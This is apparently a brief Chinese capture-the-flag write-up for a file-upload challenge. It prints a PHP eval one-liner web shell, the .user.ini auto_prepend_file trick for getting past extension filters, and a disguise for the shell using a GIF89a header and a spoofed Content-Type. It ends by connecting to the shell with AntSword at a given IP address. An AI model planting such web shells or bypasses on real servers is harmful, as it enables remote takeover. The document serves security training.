1.下载蚁剑
2.应该是上传木马拿flag
@eval($_POST[‘hack‘])
木马详解:PHP 一句话木马 @eval($_POST[‘hack‘]); 语句解析及靶机演示_php @eval-CSDN博客
发现单纯php后缀被过滤,悲
找了半天用: .user.ini
参考:.user.ini文件构成的PHP后门 - phith0n (wooyun.js.org)
用vim创建一个.user.ini文本
内容为auto_prepend_file=a.jpg
记得加文件头GIF89a(否则会过滤)和改文件类型Content-Type: image/jpg
a.jpg为图片木马,名字随便
内容:GIF89a
<?=eval($_POST['a']); ?>
这个直接提交。
然后拿出蚁剑
1.添加数据
路径就是http://61.147.171.105:54495/uploads/index.php
密码就是a
链接后找根目录,有flag